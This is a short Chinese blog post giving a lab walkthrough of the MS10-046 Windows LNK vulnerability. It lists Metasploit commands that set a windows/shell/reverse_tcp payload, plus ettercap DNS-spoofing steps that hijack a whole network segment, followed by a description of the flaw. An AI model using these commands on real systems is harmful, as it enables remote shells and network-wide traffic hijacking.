ms10-046漏洞

Posted mrwuhuai

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ms10-046漏洞相关的知识,希望对你有一定的参考价值。

ms10-046漏洞攻击

实验过程

  • 1.通过命令: ipconfigifconfig 确认攻击机和靶机在同一网段
  • 2.通过ping命令确认靶机存活。
  • 3.通过命令: msfconsole启用msf。
  • 4.攻击。
    • 1.搜索漏洞,命令: search ms10-046。通过use使用漏洞。
    • 2.设置主机监听地址,命令:set srvhost 本机ip地址
    • 3.设置攻击机地址,命令:set lhost 本机ip
    • 4.加载攻击载荷,命令:set payload windows/shell/reverse_tcp
    • 5.进行攻击:exploit/run
  • 5.配合使用ettercap进行dns欺骗。在文件最后添加*.com A 本机ip
    #cd /etc/ettercap
    #ls
    #vim etter.dns
  • 6.开启ettercap劫持整个网段,命令:ettercap -T -q -i eth0 -P dns_spoof ////
  • 7.劫持成功

漏洞描述:

Microsoft Windows快捷方式LNK文件自动执行代码漏洞

Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所制定的目标具有相同效果。Windows没有正确的处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在的位置就足以触发这个漏洞

受影响系统包括:Windows XP SP3/SP2、Vista SP2/SP1、Server 2008 R2/SP2和Windows 7

以上是关于ms10-046漏洞的主要内容,如果未能解决你的问题,请参考以下文章

实现简单木马免杀

Windows漏洞:MS08-067远程代码执行漏洞复现及深度防御

漏洞复现:MS14-064 OLE远程代码执行漏洞

Microsoft Windows DNS解析远程代码执行漏洞(MS11-030)

Microsoft Windows Messenger ActiveX控件远程代码执行漏洞(MS11-027)

MS15-034漏洞复现HTTP.SYS远程代码执行漏洞